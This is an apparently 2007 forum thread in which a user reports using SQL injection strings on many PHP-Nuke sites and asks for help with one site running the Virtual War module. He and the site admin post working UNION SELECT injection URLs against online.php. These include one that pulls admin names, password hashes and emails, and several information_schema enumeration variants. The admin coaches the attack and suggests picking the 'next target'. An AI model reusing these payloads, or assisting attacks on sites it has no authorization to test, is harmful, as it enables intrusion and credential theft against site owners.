 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Virtual War v1.5 R15 help |
 |
 Posted: Mon Sep 03, 2007 2:47 pm |
 |
|
| Dorsk |
| Regular user |
 |
|
| Joined: Aug 28, 2007 |
| Posts: 20 |
|
|
|
 |
|
 |
|
Dorsk again,
I have a PHPNUKE website running :
 Platinum 7.6.b.4
NukeSentinel? 2.4.2pl1
Virtual War v1.5 R15.
I have been able to use the waraxe strings on many sites with success! But, on this one particular site, I am able to put in this code:
| Code: |
/modules/vwar/extra/online.php?n=waraxe
|
And I get what is expected from waraxe's tut.
I am also able to add this:
| Code: |
/modules/vwar/extra/online.php?n=_member+WHERE+0+UNION+ALL+SELECT+1,@@version,3/*
|
and I get a version of:
5.0.27-standard
So far, so good.. Well, except the version stated above.
Now, when I put this code in:
| Code: |
/modules/vwar/extra/online.php?n=_member+WHERE+0+UNION+ALL+SELECT+1,CONCAT(aid,CHAR(94),pwd,CHAR(94),email),3+FROM+nuke_authors/*
|
I get a "500 Internal Server Error"
Here is what it says:
| Code: |
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster@xxxxx.xxx and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
|
What am I doing wrong, or what can I do to fix this.
Also, I have read that getting a "500" error can be a good thing.
I have ran this on other PHPNUKE sites with the same versions/sentinal with great success! So, what is going wrong with this site?
Any help?  |
|
|
|
|
|
|
|
|
| Posted: Mon Sep 03, 2007 3:35 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Error 500 in this specific case means, that sql error occurs. Probably webmaster has given phpnuke table index different from "nuke_".
In most cases this can be big problem from attackers point of view, but as this MySql version is >5.0, then you maybe can use information schema system tables to find out phpnuke table names.
How? Like this:
| Code: |
/modules/vwar/extra/online.php?n=_member+WHERE+0+UNION+ALL+SELECT+1,table_name,3+FROM+information_schema.tables/*
|
You should see all the sql table names, accessible by your current privileges. |
|
|
|
|
| Posted: Mon Sep 03, 2007 4:16 pm |
|
|
| Dorsk |
| Regular user |
|
|
| Joined: Aug 28, 2007 |
| Posts: 20 |
|
|
|
|
|
|
|
Odd, I am getting the same 500 error as before, even with this new line waraxe.
I am guessing I will need to find out the db info. I wonder what they may have changed. |
|
|
|
|
| Posted: Mon Sep 03, 2007 4:29 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Dorsk wrote: | Odd, I am getting the same 500 error as before, even with this new line waraxe.
I am guessing I will need to find out the db info. I wonder what they may have changed. |
Maybe this database wants case-sensitive table names.
Try:
| Code: | | /modules/vwar/extra/online.php?n=_member+WHERE+0+UNION+ALL+SELECT+1,TABLE_NAME,3+FROM+INFORMATION_SCHEMA.TABLES/* |
Or there can be some collision problems, try:
| Code: | | /modules/vwar/extra/online.php?n=_member+WHERE+0+UNION+ALL+SELECT+1,HEX(TABLE_NAME),3+FROM+INFORMATION_SCHEMA.TABLES/* |
|
|
|
|
|
| Posted: Mon Sep 03, 2007 4:40 pm |
|
|
| Dorsk |
| Regular user |
|
|
| Joined: Aug 28, 2007 |
| Posts: 20 |
|
|
|
|
|
|
|
| Haha, wow, still the same 500 error. I did make sure everything was correct before I pressed "enter" |
|
|
|
|
| Posted: Mon Sep 03, 2007 4:47 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Seems to be problematic target. Maybe give up and select next target? |
|
|
|
|
| Posted: Mon Sep 03, 2007 5:11 pm |
|
|
| Dorsk |
| Regular user |
|
|
| Joined: Aug 28, 2007 |
| Posts: 20 |
|
|
|
|
|
|
|
| waraxe wrote: | | Seems to be problematic target. Maybe give up and select next target? |
Haha, it looks that way.
Unless you have any other ideas.
I stated above the PHPNUKE version and sentinal version.
Let me know what you think! |
|
|
|
|
| Posted: Mon Sep 03, 2007 5:29 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Well, it's remote server and if you can't see error 500 logs, then it's difficult to overcome this problem ...  |
|
|
|
|
| Posted: Mon Sep 03, 2007 5:34 pm |
|
|
| Dorsk |
| Regular user |
|
|
| Joined: Aug 28, 2007 |
| Posts: 20 |
|
|
|
|
|
|
|
no worries then. Haha, I will try another route. What other modules can I input script?
I do use the script for the search module. Any others that are good? |
|
|
|
|
| Posted: Thu Sep 06, 2007 2:41 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
|
|
|
|
| Posted: Fri Sep 07, 2007 3:19 am |
|
|
| Dorsk |
| Regular user |
|
|
| Joined: Aug 28, 2007 |
| Posts: 20 |
|
|
|
|
|
|
|
Waraxe,
This is some very good finds! I will take a look at these and let you know if I find something that works!
Thanks! |
|
|
|
|
www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 61
Members: 0
Total: 61
